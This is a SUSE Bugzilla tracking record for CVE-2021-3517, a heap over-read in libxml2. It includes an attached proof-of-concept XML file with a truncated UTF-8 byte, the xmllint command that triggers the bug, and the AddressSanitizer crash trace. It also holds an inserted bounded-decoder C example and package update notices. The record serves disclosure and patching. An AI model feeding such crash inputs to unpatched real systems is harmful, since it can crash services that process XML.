Bug 1185410 (CVE-2021-3517)

Summary: VUL-0: CVE-2021-3517: libxml2: heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c
Product: [Novell Products] SUSE Security Incidents
Reporter: Robert Frohl <rfrohl>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: pmonrealgonzalez, smash_bz, stoyan.manolov
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/282977/
Whiteboard: CVSSv3.1:SUSE:CVE-2021-3517:5.9:(AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Attachments: PoC from https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

Description Robert Frohl 2021-04-28 12:56:20 UTC
rh#1954232

A heap-based buffer overflow was found in libxml2 when processing truncated UTF-8 input.

Reference:
https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

Upstream patch:
https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1954232
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3517
Comment 2 Pedro Monreal Gonzalez 2021-04-28 18:05:23 UTC
Factory submission:
   https://build.opensuse.org/request/show/889099
Comment 3 Pedro Monreal Gonzalez 2021-04-28 18:24:17 UTC
Created attachment 848854 [details]
PoC from https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

All codestreams affected:

germ204:/usr/src/packages # ./BUILD/libxml2-2.9.7/xmllint --recover --postvalid poc2
poc2:3: parser error : Input is not proper UTF-8, indicate encoding !
Bytes: 0xEC 0x22 0x20 0x69
<xsl:output method="htm�" indent="yes" encoding="utf-8" doctype-public="-//W3C//
                       ^
<?xml version="1.0"?>
<!DOCTYPE stylesheet [
<!ENTITY nbsp "<xsl:text disable-output-escaping='yes'>&amp;nbsp;</xsl:text>">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="2.0">
<xsl:output method="htm�" indent="yes" encoding="utf-8" doctype-public="-//W3C//DTD HTML 4.01 Transitional//EN"/>
</xsl:stylesheet>
poc2:2: element stylesheet: validity error : No declaration for element stylesheet
poc2:2: element stylesheet: validity error : No declaration for attribute version of element stylesheet
poc2:2: element stylesheet: validity error : No declaration for attribute xmlns:xsl of element stylesheet
poc2:3: element output: validity error : No declaration for element output
=================================================================
==16692==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000336 at pc 0x7f570a0b640e bp 0x7ffe91879d70 sp 0x7ffe91879d68
READ of size 1 at 0x602000000336 thread T0
    #0 0x7f570a0b640d in xmlEncodeEntitiesInternal /usr/src/packages/BUILD/libxml2-2.9.7/entities.c:583
    #1 0x7f570a11989c in xmlNodeListGetString__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/tree.c:1699
    #2 0x7f570a15e655 in xmlValidateElement__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/valid.c:6415
    #3 0x7f570a15e588 in xmlValidateElement__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/valid.c:6434
    #4 0x7f570a15eeed in xmlValidateDocument__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/valid.c:6871
    #5 0x40c468 in parseAndPrintFile /usr/src/packages/BUILD/libxml2-2.9.7/xmllint.c:2809
    #6 0x406afd in main /usr/src/packages/BUILD/libxml2-2.9.7/xmllint.c:3757
    #7 0x7f5709503349 in __libc_start_main (/lib64/libc.so.6+0x24349)
    #8 0x408789 in _start (/usr/src/packages/BUILD/libxml2-2.9.7/.libs/xmllint+0x408789)

0x602000000336 is located 0 bytes to the right of 6-byte region [0x602000000330,0x602000000336)
allocated by thread T0 here:
    #0 0x7f570ad41500 in malloc (/usr/lib64/libasan.so.4+0xdc500)
    #1 0x7f570a1f3d2a in xmlBufResize /usr/src/packages/BUILD/libxml2-2.9.7/buf.c:827

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/packages/BUILD/libxml2-2.9.7/entities.c:583 in xmlEncodeEntitiesInternal
Shadow bytes around the buggy address:
  0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa 00 01 fa fa 05 fa
  0x0c047fff8020: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8030: fa fa fd fa fa fa fd fa fa fa 04 fa fa fa fd fa
  0x0c047fff8040: fa fa fd fa fa fa 05 fa fa fa 00 03 fa fa fd fa
  0x0c047fff8050: fa fa fd fa fa fa fd fd fa fa 04 fa fa fa fd fa
=>0x0c047fff8060: fa fa fd fa fa fa[06]fa fa fa fd fa fa fa fd fd
  0x0c047fff8070: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
  0x0c047fff8080: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 05 fa
  0x0c047fff8090: fa fa 07 fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16692==ABORTING
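The trace above is a read of one byte immediately past a 6-byte heap region inside xmlEncodeEntitiesInternal(), and the description names the trigger: input that ends in the middle of a multibyte UTF-8 sequence, so a decoder that trusts the lead byte and reads the continuation bytes walks off the end of the buffer. The following is an added example, not libxml2's code and not the upstream patch linked in the description. It is a bounded UTF-8 decoder plus an entity-escaping routine in the same spirit as the affected function; the function names (utf8_decode_bounded, escape_xml_text, unchecked_overread_bytes) and the sample input "htm\xEC" are constructed for this illustration. The point it demonstrates is the check that stops the scan at the buffer end (length of the announced sequence against bytes remaining), with a helper that quantifies how far an unchecked decoder would read past the end for a given tail.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bytes a UTF-8 lead byte announces, or 0 for a byte that cannot start a
 * sequence (continuation bytes 0x80-0xBF, overlong leads C0/C1, F5 and up). */
int utf8_seq_len(unsigned char lead) {
    if (lead < 0x80) return 1;
    if (lead < 0xC2) return 0;
    if (lead < 0xE0) return 2;
    if (lead < 0xF0) return 3;
    if (lead < 0xF5) return 4;
    return 0;
}

/* How many bytes a decoder that trusts the lead byte and reads cur[1..l-1]
 * without consulting 'remaining' would touch past the end of the buffer.
 * A lone 0xEC (3-byte lead) as the last byte gives 2.  (Constructed helper.) */
size_t unchecked_overread_bytes(const unsigned char *cur, size_t remaining) {
    if (remaining == 0) return 0;
    size_t l = (size_t)utf8_seq_len(cur[0]);
    return l > remaining ? l - remaining : 0;
}

/* Bounded decoder: reads one code point from cur[0..remaining-1].
 * Returns the code point and sets *len, or -1 for an invalid or truncated
 * sequence.  It never reads cur[i] for i >= remaining. */
int utf8_decode_bounded(const unsigned char *cur, size_t remaining, int *len) {
    if (remaining == 0) return -1;
    int l = utf8_seq_len(cur[0]);
    if (l == 0 || (size_t)l > remaining) return -1;   /* truncated input stops here */
    if (l == 1) { *len = 1; return cur[0]; }
    int val = cur[0] & (0xFF >> (l + 1));             /* payload bits of the lead byte */
    for (int i = 1; i < l; i++) {
        if ((cur[i] & 0xC0) != 0x80) return -1;        /* not a continuation byte */
        val = (val << 6) | (cur[i] & 0x3F);
    }
    /* reject overlong forms, UTF-16 surrogates and values beyond U+10FFFF */
    if ((l == 3 && val < 0x800) || (l == 4 && val < 0x10000) ||
        (val >= 0xD800 && val <= 0xDFFF) || val > 0x10FFFF) return -1;
    *len = l;
    return val;
}

/* Append s to out[0..cap-1] keeping a NUL terminator; -1 if it does not fit. */
static int put_str(char *out, size_t cap, size_t *pos, const char *s) {
    size_t n = strlen(s);
    if (*pos + n + 1 > cap) return -1;
    memcpy(out + *pos, s, n + 1);
    *pos += n;
    return 0;
}

/* Escape in[0..in_len-1] (no NUL required) for XML text: <, > and & become
 * entities, other ASCII is copied, other code points become &#xHHHH;.  An
 * invalid or truncated UTF-8 sequence is replaced by U+FFFD and the scan
 * advances one byte, so in_len alone bounds every read.  Returns the output
 * length, or -1 if out is too small. */
long escape_xml_text(const unsigned char *in, size_t in_len, char *out, size_t cap) {
    size_t pos = 0, i = 0;
    char num[16];
    if (cap == 0) return -1;
    out[0] = '\0';
    while (i < in_len) {
        unsigned char c = in[i];
        if (c == '<') { if (put_str(out, cap, &pos, "&lt;")) return -1; i++; }
        else if (c == '>') { if (put_str(out, cap, &pos, "&gt;")) return -1; i++; }
        else if (c == '&') { if (put_str(out, cap, &pos, "&amp;")) return -1; i++; }
        else if (c < 0x80) {
            if (pos + 2 > cap) return -1;
            out[pos++] = (char)c; out[pos] = '\0'; i++;
        } else {
            int l = 0;
            int val = utf8_decode_bounded(in + i, in_len - i, &l);
            if (val < 0) { val = 0xFFFD; l = 1; }   /* substitute; never walk past in_len */
            snprintf(num, sizeof num, "&#x%X;", val);
            if (put_str(out, cap, &pos, num)) return -1;
            i += (size_t)l;
        }
    }
    return (long)pos;
}

int main(void) {
    /* Constructed input: a value cut off inside a 3-byte sequence, the
     * situation the report describes. */
    const unsigned char truncated[] = "htm\xEC";
    char out[64];
    printf("unchecked decoder would read %zu byte(s) past the end\n",
           unchecked_overread_bytes(truncated + 3, 1));
    if (escape_xml_text(truncated, 4, out, sizeof out) >= 0)
        printf("escaped: %s\n", out);
    return 0;
}
```

The design choice worth copying is that the decoder takes the number of bytes left as a parameter and compares it with the length the lead byte announces before touching any continuation byte; a NUL terminator is not a substitute, because a truncated sequence can end exactly at the allocation boundary, which is what the 6-byte region in the AddressSanitizer report shows.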
Comment 6 Swamp Workflow Management 2021-05-05 19:25:34 UTC
SUSE-SU-2021:1523-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 1185408,1185409,1185410
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518
JIRA References: 
Sources used:
SUSE MicroOS 5.0 (src):    libxml2-2.9.7-3.31.1
SUSE Linux Enterprise Module for Python2 15-SP3 (src):    python-libxml2-python-2.9.7-3.31.1
SUSE Linux Enterprise Module for Python2 15-SP2 (src):    python-libxml2-python-2.9.7-3.31.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    libxml2-2.9.7-3.31.1, python-libxml2-python-2.9.7-3.31.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    libxml2-2.9.7-3.31.1, python-libxml2-python-2.9.7-3.31.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 7 Swamp Workflow Management 2021-05-05 19:26:49 UTC
SUSE-SU-2021:1524-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 1185408,1185409,1185410
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518
JIRA References: 
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    libxml2-2.9.4-46.40.1
SUSE Linux Enterprise Server 12-SP5 (src):    libxml2-2.9.4-46.40.1, python-libxml2-2.9.4-46.40.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Swamp Workflow Management 2021-05-09 07:15:07 UTC
openSUSE-SU-2021:0692-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 1185408,1185409,1185410
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    libxml2-2.9.7-lp152.10.9.1, python-libxml2-python-2.9.7-lp152.10.9.1
Comment 10 Swamp Workflow Management 2021-05-19 19:17:41 UTC
SUSE-SU-2021:1654-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1185408,1185409,1185410,1185698
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
SUSE MicroOS 5.0 (src):    libxml2-2.9.7-3.34.1
SUSE Linux Enterprise Module for Python2 15-SP3 (src):    python-libxml2-python-2.9.7-3.34.1
SUSE Linux Enterprise Module for Python2 15-SP2 (src):    python-libxml2-python-2.9.7-3.34.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    libxml2-2.9.7-3.34.1, python-libxml2-python-2.9.7-3.34.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    libxml2-2.9.7-3.34.1, python-libxml2-python-2.9.7-3.34.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 11 Swamp Workflow Management 2021-05-19 19:20:32 UTC
SUSE-SU-2021:14729-1: An update that fixes 9 vulnerabilities is now available.

Category: security (important)
Bug References: 1159928,1161517,1161521,1176179,1185408,1185409,1185410,1185698
CVE References: CVE-2014-0191,CVE-2019-19956,CVE-2019-20388,CVE-2020-24977,CVE-2020-7595,CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 12 Swamp Workflow Management 2021-05-19 19:22:34 UTC
SUSE-SU-2021:1658-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1185408,1185409,1185410,1185698
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE OpenStack Cloud Crowbar 8 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE OpenStack Cloud 9 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE OpenStack Cloud 8 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP5 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
HPE Helion Openstack 8 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 13 Swamp Workflow Management 2021-05-22 10:19:42 UTC
openSUSE-SU-2021:0764-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1185408,1185409,1185410,1185698
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    libxml2-2.9.7-lp152.10.12.1, python-libxml2-python-2.9.7-lp152.10.12.1